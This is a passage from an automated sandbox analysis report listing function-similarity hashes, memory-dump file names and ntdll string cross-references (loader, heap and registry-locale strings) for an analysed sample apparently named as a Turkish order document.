                                                                  • API String ID: 0-1537733988
                                                                  • Opcode ID: a43b7cda93c295a9c84eb6e7ad91145456b1ace2a2969653e4469e25caedd291
                                                                  • Instruction ID: 1a92fe5f92b5d447c65f2174673c435e991a9922be45b71eff06d74debefb560
                                                                  • Opcode Fuzzy Hash: a43b7cda93c295a9c84eb6e7ad91145456b1ace2a2969653e4469e25caedd291
                                                                  • Instruction Fuzzy Hash: 6071AF745093419FD704CF24C990AABFBE5BF8875CFA0891DE89A87390CB70D905CBA2
                                                                  Strings
                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 32E0B82A
                                                                  • TargetNtPath, xrefs: 32E0B82F
                                                                  • GlobalizationUserSettings, xrefs: 32E0B834
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                  • API String ID: 0-505981995
                                                                  • Opcode ID: b2d1c6149ab40e54c67d9e9f87061add247adaea1b136815f04136a3b8627e81
                                                                  • Instruction ID: 0e139cf869e6b4287d40b7357604bc03be753e8a1d9bad91275762b914eb5bd7
                                                                  • Opcode Fuzzy Hash: b2d1c6149ab40e54c67d9e9f87061add247adaea1b136815f04136a3b8627e81
                                                                  • Instruction Fuzzy Hash: 5F61C472D41228ABDB21DF55DC89BD9B7B8FF04718F4181E9A908A7350CB749E85CFA0
                                                                  Strings
                                                                  • HEAP: , xrefs: 32D8E6B3
                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 32D8E6C6
                                                                  • HEAP[%wZ]: , xrefs: 32D8E6A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                  • API String ID: 0-1340214556
                                                                  • Opcode ID: 5e23e1087794d0e972f67752f94361985bad0848dbf8d637b5d06158f6545692
                                                                  • Instruction ID: beb1f2200eacb80cec53be5f7e61c66d0debbe5c10bccd855f97e99ae175e80c
                                                                  • Opcode Fuzzy Hash: 5e23e1087794d0e972f67752f94361985bad0848dbf8d637b5d06158f6545692
                                                                  • Instruction Fuzzy Hash: 6651D5B5604784EFE312CB68C845B96FBF8FF05348F1444A5E9819B792DB74E940CB61
                                                                  Strings
                                                                  • LdrpAllocateTls, xrefs: 32DA1B40
                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32DA1B39
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 32DA1B4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                  • API String ID: 0-4274184382
                                                                  • Opcode ID: ace269ba0f6b665949f527a61e1682cce5c46ed0f9ed37db3a4b2eb49ceafa30
                                                                  • Instruction ID: e57eb165b970e9fbd2df3d99ebabf3d4fc3d02b8189b6265ef57832d460eb71c
                                                                  • Opcode Fuzzy Hash: ace269ba0f6b665949f527a61e1682cce5c46ed0f9ed37db3a4b2eb49ceafa30
                                                                  • Instruction Fuzzy Hash: 534188B5A01608EFDB05CFA8C941AAEBBF5FF48B18F508519E406A7710DB75A841CBA0
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 32DEC1C5
                                                                  • @, xrefs: 32DEC1F1
                                                                  • PreferredUILanguages, xrefs: 32DEC212
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                  • API String ID: 0-2968386058
                                                                  • Opcode ID: ad661267733219919cd1aa7070d00231a542b3fcaffe8d5aef2f3fe6beebbe8f
                                                                  • Instruction ID: 86985484ad37fd83795e76f021ec86ccd2b224adc804de855428c90c62d34bf0
                                                                  • Opcode Fuzzy Hash: ad661267733219919cd1aa7070d00231a542b3fcaffe8d5aef2f3fe6beebbe8f
                                                                  • Instruction Fuzzy Hash: 25415275D00209EFDB01DED4C891FDEB7B8AB14B48F50816AE906B7350DBB49A44CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context data, xrefs: 32DA29FE
                                                                  • RtlCreateActivationContext, xrefs: 32DA29F9
                                                                  • Actx , xrefs: 32D633AC
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                  Strings
                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 32DA1A40
                                                                  • LdrpInitializeTls, xrefs: 32DA1A47
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 32DA1A51
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                  Strings
                                                                  • BuildLabEx, xrefs: 32D7130F
                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 32D7127B
                                                                  • @, xrefs: 32D712A5
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                  Strings
                                                                  • LdrpInitializationFailure, xrefs: 32DB20FA
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32DB2104
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 32DB20F3
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: #%u
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: kLsE
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `$`
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$
                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 32D3A2FB
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 32D3A309
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local\$@
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: a883c1ba581fe11fdb6ae0f8df4e014cde6ea6d4602777ae1c4ecdabc0ff6e1b
                                                                  • Instruction ID: 463926e88b90185dd681d8c97cdd8c9bc458cd01174b00075df11f809a8e8779
                                                                  • Opcode Fuzzy Hash: a883c1ba581fe11fdb6ae0f8df4e014cde6ea6d4602777ae1c4ecdabc0ff6e1b
                                                                  • Instruction Fuzzy Hash: 52826A79E023188BEB16CFA9C880BDDB7B1BF48354F108169EA59AB394DB709D41CF50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 5d77b3338c981b368ad0752a42e1802f1ac71b0d0f38afaa619a492aff6439f3
                                                                  • Instruction ID: ea2a54ac741ea8f912a3c3aea4db27e80ec7fba705d23f64fcc1021c1a5e17d7
                                                                  • Opcode Fuzzy Hash: 5d77b3338c981b368ad0752a42e1802f1ac71b0d0f38afaa619a492aff6439f3
                                                                  • Instruction Fuzzy Hash: E1229CB8204B919BEB18CF2DC090762B7F1AF45348F54C45AE8D68F385EB75E592CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @[2@[2
                                                                  • API String ID: 0-2854983874
                                                                  • Opcode ID: 2d6b84e213b1bec05791af55b2fc98d751bcd6cef750703a9d86a3b2d0fec55c
                                                                  • Instruction ID: 8c8763f8c10c5092aa77cbab848b86c6a9e040b816495af67c2a481aff89907e
                                                                  • Opcode Fuzzy Hash: 2d6b84e213b1bec05791af55b2fc98d751bcd6cef750703a9d86a3b2d0fec55c
                                                                  • Instruction Fuzzy Hash: 3032C3B5E00259DFDF14CF68C880BAEBBB1FF54758F640129E845AB384EB759941CB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 46f5dd717e34b7594895b1e0354561057579cb7936941d59964afb755907aa98
                                                                  • Instruction ID: eef811ceaf0b267dfc2dc8a7be92ddbe18cfeaaf0469fde61828c07a36d8fb94
                                                                  • Opcode Fuzzy Hash: 46f5dd717e34b7594895b1e0354561057579cb7936941d59964afb755907aa98
                                                                  • Instruction Fuzzy Hash: 13B111B56093818FD355CF28C480A5ABBF1BF88704F544A6EF899CB352D770E945CB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2335c86b992a3bc4808104feb478be12d53d95a0eacf7ed2204fe7c96d68d2aa
                                                                  • Instruction ID: 1289aaf4fa95c72f93fd46deb4729573808e6cfdc0cf510a6e12d45c22a0d88b
                                                                  • Opcode Fuzzy Hash: 2335c86b992a3bc4808104feb478be12d53d95a0eacf7ed2204fe7c96d68d2aa
                                                                  • Instruction Fuzzy Hash: 59A17AB5A09741DFE315CF28C480A1ABBE5BF88754F10492EFA859B350EB70E945CF92
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f9ea9e31e933a05bfccfac145345c66387752259412ce0d62dae4c1b91c7485
                                                                  • Instruction ID: 6ed6315da772257a522b98f0857003ee2e137bc58254077991d3c98d37e35c70
                                                                  • Opcode Fuzzy Hash: 2f9ea9e31e933a05bfccfac145345c66387752259412ce0d62dae4c1b91c7485
                                                                  • Instruction Fuzzy Hash: 9A614175A01606EFEB09DF68C480AADFBB5BF48744F24866AD559A7300DB70A941CFD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d703490ff3bbc7008fc1557d820396404f8c836c88a88ccdab3b2b2b735aae5d
                                                                  • Instruction ID: a9d17a53157330dde06c7d155b0d4079f1f0b93b43adf654f45baa9f3a02462d
                                                                  • Opcode Fuzzy Hash: d703490ff3bbc7008fc1557d820396404f8c836c88a88ccdab3b2b2b735aae5d
                                                                  • Instruction Fuzzy Hash: 574147B4D013889FDB14DFA9C881AADBBF4FB48744F90856EE49AA7311DB309941CF60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 7ea12b62c76abe0a07ec2991f2cb92da825fb1e07f8b8ebd68b33363958fb988
                                                                  • Instruction ID: 4a025edd8bc950c86636c643088a79bcb087f27202d59db359ed451a0787750d
                                                                  • Opcode Fuzzy Hash: 7ea12b62c76abe0a07ec2991f2cb92da825fb1e07f8b8ebd68b33363958fb988
                                                                  • Instruction Fuzzy Hash: 1941BFB5902700CFD716EF28C945B59B7B1FF44350F1186AACA569B3A0DB709D81CF61
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 16d1aac1c9f17819bc6d3dd4c3e61782db5d1b490667ea6ca69555105491d5ab
                                                                  • Instruction ID: a0c3fdf835e646743ce4a42378fdd200c35a44711bda29d6dd646c76a5de9125
                                                                  • Opcode Fuzzy Hash: 16d1aac1c9f17819bc6d3dd4c3e61782db5d1b490667ea6ca69555105491d5ab
                                                                  • Instruction Fuzzy Hash: 1B312F72501304AFC311DF24C880B6A77A9EF857A8F554669EC459F391DBB1ED82CBE0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 81cb07a1df3b07df7e26032931d6946100a6041dbdd17609e544e37810749188
                                                                  • Instruction ID: 51af4110195ce539de204f2d16fcd804817b49dc542c828909074e9697dcbf8d
                                                                  • Opcode Fuzzy Hash: 81cb07a1df3b07df7e26032931d6946100a6041dbdd17609e544e37810749188
                                                                  • Instruction Fuzzy Hash: 2B31AC35716A05FFE7469B24EA40A89BBA6FF88340F54A025FE4087B50DB70E831CBD0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: cb8081cd47af904e57eb172adc214abb5ffd64f4a569df060c86903ba42aaaa4
                                                                  • Instruction ID: 4e8490c930bbaafee6c93a39241e394db5a906be1422500ef5615df16ee7375a
                                                                  • Opcode Fuzzy Hash: cb8081cd47af904e57eb172adc214abb5ffd64f4a569df060c86903ba42aaaa4
                                                                  • Instruction Fuzzy Hash: 412104751063909FE762AF14CA48B1ABBA0FF80B14F894569EE460BB50CF70E844CBD1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: f9743af586df177e2f837ad139e24dad8a85ed1728e4cff021e4bbc97d6e219e
                                                                  • Instruction ID: 677f5cb1fe74bb3c65cd60866acb1280fabe6bd9dd2038bbfedf8cb103642c54
                                                                  • Opcode Fuzzy Hash: f9743af586df177e2f837ad139e24dad8a85ed1728e4cff021e4bbc97d6e219e
                                                                  • Instruction Fuzzy Hash: 28F02432100340AFD331DB19CD04F8BBBFDEF84B14F29051DE98293290CAA0F945C660
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: daf1cfc49c48cc1c2e3c3bf64394243c580f21f4c90cb5aa9c5bd857d95afa49
                                                                  • Instruction ID: ef3514a26e8d5a624fc34bb80ed7fce860df23cd181c47672b91019990c8a05b
                                                                  • Opcode Fuzzy Hash: daf1cfc49c48cc1c2e3c3bf64394243c580f21f4c90cb5aa9c5bd857d95afa49
                                                                  • Instruction Fuzzy Hash: 087170B9E0031ACFDF18CFA8D5A0A9DBBB1BF48744F10812AE845A7740DB749841CFA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                  • Instruction ID: 77a8a6bb84aec0acc873c3bf841025d795d5fbd50d49932a197e7b5dd8d932d4
                                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                  • Instruction Fuzzy Hash: 6F616BB5D02259AFDB12CFA9C844BDEBBB4FF84754F10452AE911A7390DB749A01CBA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                  • Instruction ID: 8a88e00a46fba42d3a07639ad7203b1cfbfaab17ca5fe18888f5fec7f1ffc9d5
                                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                  • Instruction Fuzzy Hash: 46519EB6504745AFEB118F94C850F5BB7E8FF88794F400929B9819B390DBB4ED04CBA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  • Opcode ID: b5a055c5cfe4d766c06f9dda5fa36cd2f42a6ed72944208b16709cff9e731ca3
                                                                  • Instruction ID: 654fa01982c5f343fad3b1203fde5c8a734837e9db033b2c92ff2c350972839a
                                                                  • Opcode Fuzzy Hash: b5a055c5cfe4d766c06f9dda5fa36cd2f42a6ed72944208b16709cff9e731ca3
                                                                  • Instruction Fuzzy Hash: 83416075508351ABE710CB65D880F5BB7E8AF88758F404D29FA84E7390EF74D904C7A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
